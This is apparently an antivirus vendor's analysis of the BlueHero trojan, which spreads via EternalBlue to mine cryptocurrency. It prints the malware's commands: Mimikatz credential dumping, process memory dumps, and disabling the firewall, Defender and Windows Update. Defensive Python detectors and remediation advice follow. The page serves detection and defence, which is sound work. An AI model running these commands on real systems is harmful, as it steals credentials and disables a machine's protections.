General Explanation
Type: Trojan
Degree of destruction: high
Prevalence: average
Exploited vulnerability: EternalBlue (MS17-010)
What is a Trojan?
Trojans are a type of malware that disguise themselves as legitimate, harmless software and behave exactly like useful, functional programs, but once run they cause extensive damage to the system. Software downloaded from the web, code embedded in HTML pages, email attachments and similar channels are among the ways Trojans enter a system. Unlike viruses and worms, Trojans do not replicate themselves.
What is BlueHero malware?
This malware uses the EternalBlue vulnerability to spread to other machines. Its ultimate goal is to mine cryptocurrency and spy on the user's system. The mining is done with the victim's CPU.
Technical Explanation
Signs of infection
- The main file of the malware exists in the following paths with a random name:
%Windir%\[Random]
%Windir%\Fonts
- The miner file of the malware is in the following path, with the name [Random].exe:
%Windir%\Temp\[Random]
- A Sisco malware component is in one of the following paths, with a random name:
%Windir%\syswow64
%Windir%\system32
- Persistence for the file in %Windir%\Fonts is kept in the following registry path:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- A scheduled task with a random name exists for the file in %Windir%\Fonts
- Two services with random names are created: one for the Sisco component and the other for the file in %Windir%\[Random]
- On an infected system all of the files above are running. Notably, the miner process runs as a child process of spoolsv.exe (the Print Spooler system process).
Function explanation
When the main file is run, it first creates and executes the files listed above. It then runs a series of commands on the victim's system. These commands are as follows:
- Deleting all IPsec policies on the system with the following command:
- netsh IPSec static delete all
- Adding its own IPsec policy with the following command:
- netsh IPSec static add policy name=[Malware's ipsec] description=[Malware's ipsec]
- Creating a scheduled task, running as SYSTEM every minute, for one of its copies in the Fonts folder, with the following command:
- cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "astbpvetc" /ru system /tr "cmd /c %Windir%\Fonts\abapbsi.exe"
- The malware also uses Mimikatz to harvest credentials from the system. It is dropped as vfshost.exe under %Windir%\[Random]\Corporate\ and run with the following command; its output is appended to log.txt in the same folder:
- cmd /c %Windir%\[Random]\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> %Windir%\[Random]\Corporate\log.txt
- Disabling the firewall for the Domain, Private and Public profiles:
- cmd /c netsh firewall set opmode mode=disable
- cmd /c netsh Advfirewall set allprofiles state off
- Stopping the Internet Connection Sharing (ICS) service and disabling its startup:
- cmd /c net stop SharedAccess
- cmd /c sc config SharedAccess start= disabled
- Stopping the Windows Firewall service and disabling its startup:
- cmd /c net stop MpsSvc
- cmd /c sc config MpsSvc start= disabled
- Stopping the Windows Defender service and disabling its startup:
- cmd /c net stop WinDefend
- cmd /c sc config WinDefend start= disabled
- Stopping the Windows Update service and disabling its startup:
- cmd /c net stop wuauserv
- cmd /c sc config wuauserv start= disabled
- Dumping process memory with a tool that uses the Sysinternals ProcDump command-line syntax (-accepteula -mp, a "MiniPlus" dump), storing each dump as [ProcessId].dmp; in the example below the target is process ID 1536:
- %Windir%\TEMP\[Random]\stellulag.exe -accepteula -mp 1536 %Windir%\TEMP\[Random]\1536.dmp
- Denying the Users, Administrators and SYSTEM groups access to the hosts file with the following command:
- cmd /c echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D users & echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls %Windir%\system32\drivers\etc\hosts /T /D SYSTEM
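The command lines above are distinctive enough to detect from process-creation telemetry (Sysmon Event ID 1, EDR process logs). The following is an added example written for this page, not code from the original analysis or from Padvish: a small rule set that matches the documented commands plus the miner's parent/child relationship with spoolsv.exe, run over a constructed set of events. Directory and file names such as "kqzvbp" and "uwdtrq" are placeholders for the malware's random names, not indicators of compromise.

```python
import re
from typing import Dict, List

# Detection rules for the command lines documented above. Each rule is a name
# and a case-insensitive regex applied to the process command line.
CMDLINE_RULES = [
    ("ipsec_policy_wipe", re.compile(r"netsh\s+ipsec\s+static\s+delete\s+all", re.I)),
    ("ipsec_policy_add", re.compile(r"netsh\s+ipsec\s+static\s+add\s+policy", re.I)),
    # schtasks running something out of %Windir%\Fonts as SYSTEM
    ("schtask_system_fonts", re.compile(r"schtasks\s+/create.*/ru\s+system.*\\Fonts\\", re.I)),
    ("mimikatz_cmdline", re.compile(r"privilege::debug|sekurlsa::logonpasswords", re.I)),
    ("firewall_disable", re.compile(
        r"netsh\s+(advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
    ("service_stop", re.compile(r"net\s+stop\s+(SharedAccess|MpsSvc|WinDefend|wuauserv)\b", re.I)),
    ("service_disable", re.compile(
        r"sc\s+config\s+(SharedAccess|MpsSvc|WinDefend|wuauserv)\s+start=\s*disabled", re.I)),
    # ProcDump-style memory dump syntax, regardless of the binary's name
    ("procdump_style_dump", re.compile(r"-accepteula\s+-mp\s+\d+", re.I)),
    ("hosts_acl_deny", re.compile(r"cacls\s+.*\\drivers\\etc\\hosts\s+/T\s+/D", re.I)),
]


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the process-creation event matches."""
    cmdline = event.get("cmdline", "")
    hits = [name for name, rx in CMDLINE_RULES if rx.search(cmdline)]
    # Parent/child relationship: the miner runs as a child of spoolsv.exe
    # out of a randomly named directory under %Windir%\Temp.
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower()
    if parent.endswith("\\spoolsv.exe") and "\\windows\\temp\\" in image:
        hits.append("miner_under_spoolsv")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> matched rules, for events that matched at least one."""
    results: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample events (Sysmon Event ID 1 style fields), not captured data.
# "kqzvbp" and "uwdtrq" stand in for the random names the malware uses.
CMD = r"C:\Windows\System32\cmd.exe"
MAIN = r"C:\Windows\kqzvbp\kqzvbp.exe"  # placeholder for the main file
SAMPLE_EVENTS = [
    {"parent": MAIN, "image": CMD, "cmdline": r"cmd /c netsh IPSec static delete all"},
    {"parent": MAIN, "image": CMD, "cmdline": r'cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "astbpvetc" /ru system /tr "cmd /c C:\Windows\Fonts\abapbsi.exe"'},
    {"parent": MAIN, "image": CMD, "cmdline": r"cmd /c C:\Windows\kqzvbp\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kqzvbp\Corporate\log.txt"},
    {"parent": MAIN, "image": CMD, "cmdline": r"cmd /c netsh Advfirewall set allprofiles state off"},
    {"parent": MAIN, "image": CMD, "cmdline": r"cmd /c net stop WinDefend"},
    {"parent": MAIN, "image": CMD, "cmdline": r"cmd /c sc config WinDefend start= disabled"},
    {"parent": MAIN, "image": r"C:\Windows\Temp\kqzvbp\stellulag.exe",
     "cmdline": r"C:\Windows\Temp\kqzvbp\stellulag.exe -accepteula -mp 1536 C:\Windows\Temp\kqzvbp\1536.dmp"},
    {"parent": MAIN, "image": CMD, "cmdline": r"cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users"},
    # miner spawned by the Print Spooler from %Windir%\Temp\[Random]
    {"parent": r"C:\Windows\System32\spoolsv.exe", "image": r"C:\Windows\Temp\kqzvbp\uwdtrq.exe",
     "cmdline": r"C:\Windows\Temp\kqzvbp\uwdtrq.exe"},
    # benign activity that must not fire
    {"parent": CMD, "image": r"C:\Windows\System32\sc.exe", "cmdline": r"sc query WinDefend"},
    {"parent": r"C:\Windows\System32\spoolsv.exe", "image": r"C:\Windows\System32\PrintIsolationHost.exe",
     "cmdline": r"PrintIsolationHost.exe"},
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The parent/child rule is the most durable one: the command strings can change between samples, but a process image under %Windir%\Temp started by spoolsv.exe has no legitimate reason to exist. Tune the service and firewall rules against your own baseline, since administrators occasionally run the same net stop and sc config commands by hand.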
The main file of the malware also makes the following changes to the system:
- Changing the default handler (the default value under HKEY_CLASSES_ROOT) of several script extensions to txtfile, so that these files are opened as plain text instead of being executed, which breaks scripts and administrative tooling that rely on them. The affected extensions are:
- .bat
- .cmd
- .js
- .vbs
- .VBE
- .reg
- .ps1
- Creating an IPsec filter among the system's connection policies. The filter can be seen in the following registry path:
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local
- Defining a Debugger value under Image File Execution Options for a series of system tools, so that the user can no longer run them (Windows launches the configured "debugger" instead of the requested program). The value is set under the following registry path:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
The system tools affected by this are:
- at.exe
- bitsadmin.exe
- cacls.exe
- certutil.exe
- cscript.exe
- icacls.exe
- magnify.exe
- mshta.exe
- netsh.exe
- perfmon.exe
- powershell.exe
- reg.exe
- regini.exe
- Regsvr32.exe
- rundll32.exe
- schtasks.exe
- sethc.exe
- takeown.exe
- taskkill.exe
- WinSAT.exe
- WmiPrvSE.exe
- wscript.exe
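The registry artifacts listed in this section and under "Signs of infection" (the Run key entry for the file in %Windir%\Fonts, the IPsec policy objects, the txtfile handler hijack and the IFEO Debugger values) can be checked offline from a reg export. The following is an added example, not code from the original analysis or from Padvish: a parser for the string values of a .reg (version 5.00) export and a checker that flags the documented artifacts, run over a constructed export. The value data "nonexistent.exe", the Run entry name "qwertzu" and the all-zero policy GUID are placeholders, not observed values.

```python
from typing import Dict, List

IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
IPSEC_LOCAL_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local"

# Tools the page lists as blocked through an IFEO "Debugger" value.
BLOCKED_TOOLS = {
    "at.exe", "bitsadmin.exe", "cacls.exe", "certutil.exe", "cscript.exe",
    "icacls.exe", "magnify.exe", "mshta.exe", "netsh.exe", "perfmon.exe",
    "powershell.exe", "reg.exe", "regini.exe", "regsvr32.exe", "rundll32.exe",
    "schtasks.exe", "sethc.exe", "takeown.exe", "taskkill.exe", "winsat.exe",
    "wmiprvse.exe", "wscript.exe",
}
# Script extensions the page lists as redirected to the txtfile handler.
HIJACKED_EXTS = {".bat", ".cmd", ".js", ".vbs", ".vbe", ".reg", ".ps1"}


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a 'reg export' (.reg, version 5.00) file into {key: {name: data}}.

    Only REG_SZ data is unescaped; dword:/hex: data is kept as raw text.
    The key's default value is stored under the name "(Default)".
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if data.startswith('"') and data.endswith('"'):
            # .reg files escape backslashes and quotes inside string data
            data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
        keys[current][name] = data
    return keys


def find_artifacts(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Flag the registry artifacts described on this page; returns finding strings."""
    findings: List[str] = []
    for path, values in keys.items():
        p = path.lower()
        leaf = path.rsplit("\\", 1)[-1]
        if p.startswith(IFEO_KEY.lower() + "\\"):
            if leaf.lower() in BLOCKED_TOOLS and "Debugger" in values:
                findings.append(f"ifeo_debugger:{leaf.lower()}={values['Debugger']}")
        elif p.startswith("hkey_classes_root\\."):
            if leaf.lower() in HIJACKED_EXTS and values.get("(Default)", "").lower() == "txtfile":
                findings.append(f"ext_to_txtfile:{leaf.lower()}")
        elif p == RUN_KEY.lower():
            for name, data in values.items():
                if "\\fonts\\" in data.lower():
                    findings.append(f"run_key_fonts:{name}={data}")
        elif p.startswith(IPSEC_LOCAL_KEY.lower() + "\\"):
            # Legitimate IPsec policies live here too: report for analyst review.
            findings.append(f"ipsec_policy_object:{leaf}")
    return findings


# Constructed .reg export, not taken from a real system; the Debugger data,
# the Run entry name and the policy GUID are placeholders.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe]
"Debugger"="nonexistent.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="nonexistent.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\mydbg.exe"

[HKEY_CLASSES_ROOT\.bat]
@="txtfile"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\.cmd]
@="cmdfile"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"qwertzu"="C:\\Windows\\Fonts\\abapbsi.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{00000000-0000-0000-0000-000000000001}]
"ipsecName"="example"
"""

if __name__ == "__main__":
    for finding in find_artifacts(parse_reg_export(SAMPLE_REG)):
        print(finding)
```

On a live host, produce the input with reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg (and likewise for the other keys), and open the files with encoding="utf-16", since reg.exe writes UTF-16LE. Note that reg.exe itself is in the blocked list, so on an infected machine the export has to be taken from a clean boot environment or from the offline SOFTWARE hive; the .txt and notepad.exe entries in the sample show the checker ignoring normal handler and debugger entries that are not part of the documented behaviour.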
Remediation and disinfection
Padvish Antivirus detects this malware and removes it from the system. To prevent infection by malware that exploits the EternalBlue vulnerability, install Microsoft's MS17-010 security update. The IPS component of Padvish Antivirus also detects exploitation attempts against this vulnerability and blocks them before they reach the system.